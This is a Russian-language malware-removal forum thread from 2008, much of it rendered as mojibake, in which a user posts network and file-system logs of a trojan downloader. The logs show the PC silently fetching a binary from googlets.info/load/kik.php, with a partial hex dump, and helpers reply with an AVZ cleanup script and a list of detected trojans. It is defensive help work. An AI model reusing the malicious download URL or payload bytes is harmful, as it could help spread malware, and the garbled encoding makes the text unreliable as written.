ѕоказано с 1 по 19 из 19.

¬от така€ у мен€ ситуаци€ (за€вка є 22861)

  1. #1
    Junior Member –епутаци€
    –егистраци€
    14.05.2008
    —ообщений
    14
    ¬ес репутации
    32

    Thumbs up ¬от така€ у мен€ ситуаци€

    ѕри установлении удаленного соединени€,
    даже не подключа€ интернет эксплорер
    происходит следующее, согласно логу
    программы HTTPLook v1.251:
    от моего компа:
    66.199.247.90.80
    GET /load/kik.php?v=13&c=22444B4346529E3D&h= HTTP/1.1
    Host: googlets.info
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 9
    ответ моему компу:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 13 May 2008 17:00:39 GMT
    Content-Type: text/html; charset=windows-1251
    Connection: keep-alive
    X-Powered-By: PHP/5.2.6
    Content-transfer-encoding: binary
    Content-Length: 18
    P6 №БH0|÷ЧG2
    cХЧ$
    от моего компа:
    GET /load/kik.php?g=TSIwJQrQlE1AedWVQTUIaOWFbUiATHqEk3BcUVqu dB20D|Hi HTTP/1.1
    Host: googlets.info
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 9
    ответ моему компу:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 13 May 2008 17:00:44 GMT
    Content-Type: application/octet-stream
    Connection: keep-alive
    X-Powered-By: PHP/5.2.6
    Content-Length: 31744
    000000 01 4D 68 E4 A2 79 02 4D E2 A1 78 00 C5 AE A0 B6 .MhдҐy.Mв°x.≈Ѓ ґ
    000010 91 34 D5 6D 4B BC B2 41 2E 60 70 98 44 2F 83 3D С4’mKЉ≤A.`pШD/Г=
    000020 D4 C3 FD AE 43 DE DA 6E 2B E2 22 52 AD 82 12 D3 ‘√.ЃCёЏn+в"R­В..
    000030 B5 90 E5 55 95 2D B9 7B 98 25 D3 0D 98 9E 65 59 µРеUХ-є{Ш%..ШЮeY
    000040 39 B9 4F DE BC BF A1 8B C7 01 96 06 98 C7 CA 9A 9єOёЉњ°Л«.Ц.Ш« Ъ
    ........
    .........
    007BC0 C0 D2 DC 9C 31 90 E2 4D 5A 30 1C 48 4D 24 32 75 ј“№Ь1РвMZ0.HM$2u
    007BD0 50 E1 44 08 30 83 FC A5 E3 22 9F 32 D1 E4 EE E3 PбD.0Гь.г".2—дог
    007BE0 0C 7A ED A2 66 14 35 0F C2 58 DA DF 53 69 22 CD .z.Ґf.5.¬XЏяSi"Ќ
    007BF0 E3 26 73 13 5C E2 43 39 0B 77 5F 4D 40 C4 E0 B2 г&s.\вC9.w_M@ƒа≤
    --------------------------------------------------------------------------
    ћне интересно, где может быть прописано чтобы
    без моего т.с. согласи€, компьютер загружал файл?
    » почему он из php файла сделал exe-файл?
    ѕривожу синхронный лог из программы Filemon:
    0:01:48 System:4 IRP_MJ_CLOSE E:\Documents and Settings\All Users.WINDOWS\
    Application Data\Microsoft\Network\Connections\Pbk\rasphone.pb k SUCCESS
    0:01:57 System:4 IRP_MJ_WRITE* E:\DOCUME~1\ALEXKL~1.ALE\LOCALS~1\
    Temp\googlets.info_load_kik.php.htm SUCCESS Ofs: 0 Len: 4096
    0:01:57 System:4 IRP_MJ_SET_INFORMATION*
    ...\Temp\googlets.info_load_kik.php.htm SUCCESS Len: 4096
    0:01:59 System:4 IRP_MJ_WRITE*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 0 Len: 4096
    0:01:59 System:4 IRP_MJ_SET_INFORMATION*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 4096
    0:01:59 System:4 IRP_MJ_CLOSE
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
    0:02:00 System:4 IRP_MJ_WRITE*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 0 Len: 4096
    0:02:00 System:4 IRP_MJ_SET_INFORMATION*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 4096
    0:02:00 System:4 IRP_MJ_CLOSE
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
    0:02:01 System:4 IRP_MJ_WRITE*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 0 Len: 4096
    0:02:01 System:4 IRP_MJ_SET_INFORMATION*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 4096
    0:02:02 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 0 Len: 4096
    0:02:02 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 118784 Len: 4096
    0:02:02 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 1335296 Len: 4096
    0:02:02 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 16384 Len: 4096
    0:02:03 System:4 IRP_MJ_CLOSE
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
    0:02:03 System:4 IRP_MJ_WRITE*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 0 Len: 12288
    0:02:03 System:4 IRP_MJ_SET_INFORMATION*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 12288
    0:02:04 System:4 IRP_MJ_CLOSE
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
    0:02:04 System:4 IRP_MJ_WRITE*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 8192 Len: 8192
    0:02:04 System:4 IRP_MJ_SET_INFORMATION*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 16384
    0:02:04 System:4 IRP_MJ_CLOSE
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
    0:02:05 System:4 IRP_MJ_WRITE*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 12288 Len: 4096
    0:02:05 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 0 Len: 4096
    0:02:05 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 0 Len: 4096
    0:02:05 System:4 IRP_MJ_SET_INFORMATION*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 16384
    0:02:05 System:4 IRP_MJ_CLOSE
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
    0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 24576 Len: 8192
    0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 36864 Len: 12288
    0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 53248 Len: 4096
    0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 61440 Len: 4096
    0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 0 Len: 4096
    0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 16384 Len: 8192
    и здесь из файла googlets.info_load_kik.php.Unknown он превращаетс€...
    0:02:11 System:4 IRP_MJ_SET_INFORMATION*
    E:\DOCUME~1\NETWOR~1.000\LOCALS~1\Temp\NT46432.exe SUCCESS Len: 31744
    0:02:14 System:4 IRP_MJ_WRITE*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 12288 Len: 20480
    0:02:14 System:4 IRP_MJ_SET_INFORMATION*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 32768
    0:02:34 System:4 IRP_MJ_CLOSE
    E:\DOCUME~1\NETWOR~1.000\LOCALS~1\Temp\NT46432.exe SUCCES
    ќстаетс€ только запустить. ¬от вам и обновление системы пр€м таки
    как от Microsoft, все автоматически. ’от€ везеде где можно
    € поотключал обновление, также - все выполнени€ и загрузку бинарников.
    ¬озможно система ослаблена после недавнего посещени€
    вирусом.
    ѕока не могу найти откуда беретс€ адрес 66.199.247.90.80
    и googlets.info, какой механизм действует? »скал поголовно во
    всех файлах - не нашел, возможно система преп€тствует,
    попробую зайти из другого виндовса.  ак найти причину -
    море проблем, а как загружать "ќЅЌќ¬Ћ≈Ќ»≈" - пожалуйста.
    Ќе потенциальный ли вирус в самой системе, она же еще
    и запуститит этот файл при случае.
    ѕосоветуйте пожалуйста антивирус который следит за
    по€влением во временный файлах интернета экзешников
    и сразу их убивает. ћне не хочетс€ ставить грмоздкую
    программу и тормозить компьютер. ∆елательно чтобы он сохран€л
    текущие утановки безопасности и сигнализировал об их изменении.
    ” мен€ XP SP2. “ам в логах не правда, не Windows95, и не IE5, а IE6.
    ѕоследний раз редактировалось Rene-gad; 14.05.2008 в 13:57. ѕричина: читаемость лога Filemon :)

  2. –еклама
     

  3. #2

  4. #3
    Junior Member –епутаци€
    –егистраци€
    14.05.2008
    —ообщений
    14
    ¬ес репутации
    32
    ј втора€ ссылка - http://www.internetmap.info/cgi-bin/...?site_id=30393
    - пуста€ страница а в статубаре - "√отово". Ёто что там должно было быть?
    ” мен€ переадресаци€ в IE отключена. Ёто конечно не нормально, но нах надо ездить по путым страницам?

    ƒобавлено через 5 часов 0 минут

    ѕоискал € из другого виндовса эти выражени€ - ничего не найдено,
    кроме, кроме одного или двух файликов с раширением .dat которые
    недоступны дл€ чтени€ пока работает система (или вирус, - что мало вер€тно). ѕолучатс€ что это работает ќЅЌќ¬Ћ≈Ќ»≈. јнтивирус AWZ указал на прорехи в защите, на пару фалов из них два - от Creative Technology (карта у мен€ Audigy 2ZS), после анализа (запуска с логированием) оказалось что устанавливаетс€ хук на SHELL. —омнительна€ потребность, надо же, даже солидные производители не
    стыд€тс€ создавать мусор в системе. я не думаю что это так уж необходимо, раньше-то не требовалось и все работало.
    ј вот с прорехами в защите - потруднее, может со временем разбирусь. ј пока слова :
    >> —лужбы: разрешена потенциально опасна€ служба SSDPSRV (—лужба обнаружени€ SSDP)
    >> —лужбы: разрешена потенциально опасна€ служба Schedule (ѕланировщик заданий)

    пока не знаю таких, но поищу в —лужбах. ћожет и найду. я там и так почти все запретил что можно, однако ж.
    ƒа, эти службы был в положении ¬ручную. “еперь € их поставлю в положение ќтключено.
    ¬ том-то и дело, что следить за состо€нием этих служб надо,
    а не вспоминать о них когда обнаружен излишний трафик в
    интернете.

    ¬ообще-то говор€, искать надо сочинителей вирусов, и это не так уж и сложно (даже € нашел пару сайтов, из них один в ћоскве, другой зарубежом, и у этого - 66.199.247.90 есть хоз€ин), и потом этих сочинителей привлекать к уголовной ответственности, и делать это публично, чтобы другим повадно не было.
    ѕоследний раз редактировалось AlexKlm; 14.05.2008 в 19:09. ѕричина: ƒобавлено

  5. #4
    Junior Member –епутаци€
    –егистраци€
    14.05.2008
    —ообщений
    14
    ¬ес репутации
    32

    ¬се получаю и получаю скрипты превращающиес€ в исполн€емый модуль.

    «айцев ќлег! ¬ы бы лучше рассказали механизм проникновени€ др€ни через скрипт, а то € никак не могу пон€ть, где же дыра в системе. ¬се получаю и получаю скрипты превращающиес€ в исполн€емый модуль. ƒыра начинаетс€ с того что по началу удаленного соединени€ мой комп вызывает google.com (или еще какой-либо сайт). » отчего это происходит не могу вы€снить, уже все видимые файлы на диске с содержанием этого слова заменил на другое, и - бесполезно. ≈динственное что € не могу сделать - проверить где это зашифровано. »ли дайте пожалуйста ссылку где объ€сн€етс€ этот феномен, желательно словами программиста.

  6. #5
    Senior Member –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ јватар дл€ AndreyKa
    –егистраци€
    08.01.2005
    јдрес
    –осси€
    —ообщений
    13,624
    ¬ес репутации
    1287
    ¬ыполните ѕравила.

  7. #6
    Junior Member –епутаци€
    –егистраци€
    14.05.2008
    —ообщений
    14
    ¬ес репутации
    32

    ƒобавил журналы

    ¬от журналы обследовани€ 'пациета'. ћожет они что-то подскажут новое дл€ знающих людей.
    ¬ложени€ ¬ложени€

  8. #7
    Junior Member –епутаци€
    –егистраци€
    14.05.2008
    —ообщений
    14
    ¬ес репутации
    32
    ѕрописал € в hostes и lmhost.sam так как где-то тут на сайте сказано, - болт! Ќе реагирует ни система ни IE6. ¬ свойствах TCP € разрешил использовать хост-файл(ы). ѕолные потЄмки. ј на гугл запросы идут по 80 естественно порту, хоть волком вой.
    ѕоследний раз редактировалось AlexKlm; 16.05.2008 в 15:43.

  9. #8
    Senior Member –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ јватар дл€ AndreyKa
    –егистраци€
    08.01.2005
    јдрес
    –осси€
    —ообщений
    13,624
    ¬ес репутации
    1287
    «апустите AVZ.
    ¬ыполните скрипт через меню ‘айл:
     од:
    begin
     SetAVZGuardStatus(True);
     ClearQuarantine;
     QuarantineFile('E:\WINDOWS\system32\basemaqev32.dll','');
     QuarantineFile('D:\autorun.exe','');
     QuarantineFile('D:\autorun.inf','');
     QuarantineFile('C:\MYutil\TdiMonNt\Viruses\gon.exe','');
     QuarantineFile('C:\MYutil\TdiMonNt\Viruses\pinch.exe','');
     QuarantineFile('C:\MYutil\TdiMonNt\Viruses\Windows\winlogon.exe','');
     QuarantineFile('D:\≈щЄ\Crackz\WarezP2P_CWS.exe','');
     QuarantineFile('E:\WINDOWS\winlogon.exe','');
     DeleteFile('C:\BATC\MAIL\NataKlm\Attach\FOTO.ZIP');
     DeleteFileMask('C:\System Volume Information\_restore{7EB25BA4-1249-4D63-B0D8-728091AE44AD}', '*.*', true);
     BC_ImportAll;
     ExecuteSysClean;
     BC_Activate;
     RebootWindows(false);
    end.
     омпьютер перезагрузитс€.
    ѕришлите то, что попадет в карантин так, как написано в приложении 3 ѕравил по ссылке http://virusinfo.info/upload_virus.php?tid=22861

  10. #9
    Junior Member –епутаци€
    –егистраци€
    14.05.2008
    —ообщений
    14
    ¬ес репутации
    32
    ¬ас пон€л, сэр! “ак и сделаю. “олько тот винлогон что в виндовсе - это мой системный только дл€ чтени€ файл - замена насто€щему вирусу, а то винлогонов развелось - море. ј если были и вирусы - они давно удалены (кроме тех что € никогда не запускал) или имеют прикрученные патчи чтобы они далеко не убежали, € их исследую. Ќо это трудное зан€тие, продвигаетс€ медленно. ’отелось бы все-таки получить ответ на мой вопрос о способе проникновени€. Ќе проще ли в систему вмонтировать заглушку дл€ вс€кой попытки загружать бинарники пришедшие по сети на выполнение. »х сразу логично бы поместить в карантин и оставить на ответственность пользовател€. “олько это делать надо так чтобы имена всех атрибутов протектора были полиморфными, тогда ни один вирус не сможет приспособитьс€.

    » самое интересное: у мен€ перестал опрашиватьс€ google.com (ru), € пон€л примерно почему это происходит. ¬ первую очередь - виновата система. Ќо помогло то, что € в файле hosts прописал не несуществующий в данный момент сайт, им€ которого указано в инструкции (примере), а свой, котрый без вирусов разумеетс€ и существующий в интернете.
    Ќо кто же т€нет за €зык систему что надо об€зательно что-то там запросить по установлению удаленного соединени€? ¬ообще хотелось бы узнать как должно быть на самом деле?

    ƒобавлено через 1 час 37 минут

    –езультат загрузки
    ‘айл сохранЄн как 080516_115343_Quarantine_482dbc179aaaa.zip
    –азмер файла 955267
    MD5 34c24be845f57be9faba813738709658

    ѕо€снение: gon.exe - это тот же winlogon.exe, € переименовал когда работал с ним.
    —ложный процесс, запускает себ€ через CMD.exe, правда - убиватс€ просто.
    ј вот был другой вирус, так тот в цепочке PEB_LDR_DATA->LIST_ENTRY вычищал строки, его-то и убить из кольца 3 невозможно было. ѕришлось убивать сами файлы (он раздваиваетс€ при выполнении) из другой ќ—. “ого звали found[1].exe, его AWZ не обнаружил т.к. € ему им€ kernel32 заменил на другое. Ќе сомневаюсь, что он был загружен под именем типа found.php и тут же любезно наспакованный системой в реальное им€. ¬от такое, понимаешь, ќЅЌќ¬Ћ≈Ќ»≈.
    ѕоследний раз редактировалось AlexKlm; 16.05.2008 в 21:12. ѕричина: ƒобавлено

  11. #10
    Senior Member –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ јватар дл€ AndreyKa
    –егистраци€
    08.01.2005
    јдрес
    –осси€
    —ообщений
    13,624
    ¬ес репутации
    1287
    ѕапку C:\MYutil\TdiMonNt\Viruses лучше удалить.
    ¬ файле D:\≈щЄ\Crackz\WarezP2P_CWS.exe - Downloader.Win32.Agent.h (Trojan.DownLoader.10412)
    C:\BATC\ћусор\Dorithie.zip - Trojan-Downloader.Win32.Bagle.g
    F:\_Distr\—тарое\secret-porn-video.zip - Backdoor.Win32.Delf.co
    јнтивируса у вас нет, запустите случайно, будет веселье...
    ÷итата —ообщение от AlexKlm
    ’отелось бы все-таки получить ответ на мой вопрос о способе проникновени€. Ќе проще ли в систему вмонтировать заглушку дл€ вс€кой попытки загружать бинарники пришедшие по сети на выполнение.
    „то то в этом роде реализовано в системах HIPS. ¬ большинстве случаев все проще. «аражение происходит от того, что только что установив Windows пользователь отправл€етс€ гул€ть по сайтам, и на первом же из взломанных (их сотни тыс€ч) получает через дыры в IE тро€нов.
    —делайте новый лог из 10-го пункта ѕравил и приложите сюда.

  12. #11
    Junior Member –епутаци€
    –егистраци€
    14.05.2008
    —ообщений
    14
    ¬ес репутации
    32
    “ак € знаю где у мен€ вирусы лежат. Ёто € исследую их, запускаю, но выполн€ть
    јѕ» на порчу системы не разрешаю. я их просто мучаю, смотрю как они беспомощно бьютс€ в попытке завладеть системой.  ак они запускют севисы, отключают безопасность, что где смотр€т. Ќашел много нового дл€ себ€.

    “олько вот про autorun.exe € не знал, а вс€кое там с порно сайтов - это € и не пыталс€ запускать, это € забыл удалить.
    ћожет было желание посмотреть что они там выслали. ƒураков ищут.

    ѕытаюсь воссоздать ситуацию когда мой комп выходил в интернет с запросом. ¬осстановил файлы hosts и lmhost, не получаетс€ пока.

    —делаю как ¬ы сказали. ѕриступаю.

  13. #12
    Junior Member –епутаци€
    –егистраци€
    14.05.2008
    —ообщений
    14
    ¬ес репутации
    32
    ѕыполнил пункт 10.
    Ќо, но при проверке папки MyUtil AWZ не заметил
    вирус присланный по интернету во временных фалйлах, и может не один. я тут прикреплю Viruses3.zip, но без парол€, будте внимательны!, там неопознанные AWZ вирусы. я дважды сканировал им и он ничего не заметил.
    ¬ложени€ ¬ложени€
    ѕоследний раз редактировалось drongo; 17.05.2008 в 21:40.

  14. #13
    Senior Helper –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€
    –егистраци€
    10.01.2007
    —ообщений
    22,817
    ¬ес репутации
    1497
    карантин отправте как написано в правилах ( как не скажу, хочу что бы почитали)... из темы убрать ...

  15. #14

  16. #15
    Senior Member –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ јватар дл€ AndreyKa
    –егистраци€
    08.01.2005
    јдрес
    –осси€
    —ообщений
    13,624
    ¬ес репутации
    1287
    autorun.exe лаборатори€  асперского посчитала безопасным, в его свойствах написано, что это "AutoPlay Menu Loader" разработчика Linasoft.
    ¬ логе ничего вредоносного не увидел.
    ¬аша проблема была из-за файла E:\WINDOWS\system32\basemaqev32.dll его можно удалить.
    —транностей в работе компьютера больше нет?

  17. #16
    Junior Member –епутаци€
    –егистраци€
    14.05.2008
    —ообщений
    14
    ¬ес репутации
    32
    Ѕольше нет пока, как ни странно. Ќет интернет трафика. ќднажды вроде бы был, но € не смог его зафиксировать ни по 80 порту и с помощью TDIMon.

    "Ќе постите и не прикрепл€йте никакие другие файлы" -
    ѕрошу прощени€, € думал что это ¬ам надо а не мне. Ќе нашли - отлично, но € другого мнени€, возможно € ошибаюсь, все мы иногда ошибаемс€. —пасибо за помощь. я продолжу проверку этой dll, как она запуститс€ - € дам знать. ¬ реестре и в попул€рных директори€х ссылку на нее пока не нашел, ищу.

  18. #17
    Senior Member –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ јватар дл€ AndreyKa
    –егистраци€
    08.01.2005
    јдрес
    –осси€
    —ообщений
    13,624
    ¬ес репутации
    1287
    ÷итата —ообщение от AlexKlm
    Ќе постите и не прикрепл€йте никакие другие файлы" -
    ѕрошу прощени€, € думал что это ¬ам надо а не мне.
    ...
    я продолжу проверку этой dll, как она запуститс€ - € дам знать. ¬ реестре и в попул€рных директори€х ссылку на нее пока не нашел, ищу.
      нам и так приходит огромное количиство "мусора" из-за перестраховки и недопонимани€.
    —сылку в реестре на dll удалил скрипт.

  19. #18
    Junior Member –епутаци€
    –егистраци€
    14.05.2008
    —ообщений
    14
    ¬ес репутации
    32
    Ќет, не нашел, все в пор€дке, нигде ссылки на неЄ нет. —пасибо за помощь, вопросов больше нет.

  20. #19
    Cybernetic Helper –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€ –епутаци€
    –егистраци€
    29.12.2008
    —ообщений
    47,540
    ¬ес репутации
    941

    »тог лечени€

    —татистика проведенного лечени€:
    • ѕолучено карантинов: 1
    • ќбработано файлов: 16
    • ¬ ходе лечени€ обнаружены вредоносные программы:
      1. c:\\myutil\\tdimonnt\\viruses\\gon.exe - Trojan-Proxy.Win32.Small.oo (DrWEB: Trojan.Packed.573)
      2. c:\\myutil\\tdimonnt\\viruses\\pinch.exe - Trojan.Win32.Buzus.gqw (DrWEB: Trojan.PWS.LDPinch.1941)
      3. c:\\myutil\\tdimonnt\\viruses\\windows\\winlogon.e xe - Trojan-Proxy.Win32.Small.oo (DrWEB: Trojan.Packed.573)
      4. d:\\ещЄ\\crackz\\warezp2p_cws.exe - not-a-virusownloader.Win32.Agent.h (DrWEB: Trojan.DownLoader.10412)
      5. e:\\windows\\system32\\basemaqev32.dll - Trojan.Win32.SubSys.dl (DrWEB: Trojan.Okuks.based)


  • ”важаемый(а€) AlexKlm, наши специалисты оказали ¬ам всю возможную помощь по вашему обращению.

    ¬ цел€х поддержани€ безопасности вашего компьютера насто€тельно рекомендуем:


    Ќадеемс€ больше никогда не увидеть ваш компьютер зараженным!

    ≈сли ¬ас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
  • ѕрисоедин€йтесь к нам в соцсет€х!

    ћы делаем все возможное, чтобы помогать люд€м в защите и лечении компьютеров.

    ѕохожие темы

    1. странна€ ситуаци€
      ќт larik218 в разделе ѕомогите!
      ќтветов: 0
      ѕоследнее сообщение: 13.10.2010, 16:37
    2. ќтветов: 7
      ѕоследнее сообщение: 01.08.2010, 17:14
    3. опасна€ ситуаци€
      ќт ∆енька в разделе ѕомогите!
      ќтветов: 12
      ѕоследнее сообщение: 27.03.2009, 11:35
    4. вот така€ у мен€ проблема
      ќт пелевало в разделе ѕомогите!
      ќтветов: 1
      ѕоследнее сообщение: 15.03.2009, 18:13
    5. “јка€ проблема
      ќт dReaMer в разделе ѕомогите!
      ќтветов: 14
      ѕоследнее сообщение: 22.02.2009, 06:05

    —вернуть/–азвернуть ¬аши права в разделе

    • ¬ы не можете создавать новые темы
    • ¬ы не можете отвечать в темах
    • ¬ы не можете прикрепл€ть вложени€
    • ¬ы не можете редактировать свои сообщени€
    •  
    Page generated in 0.00500 seconds with 23 queries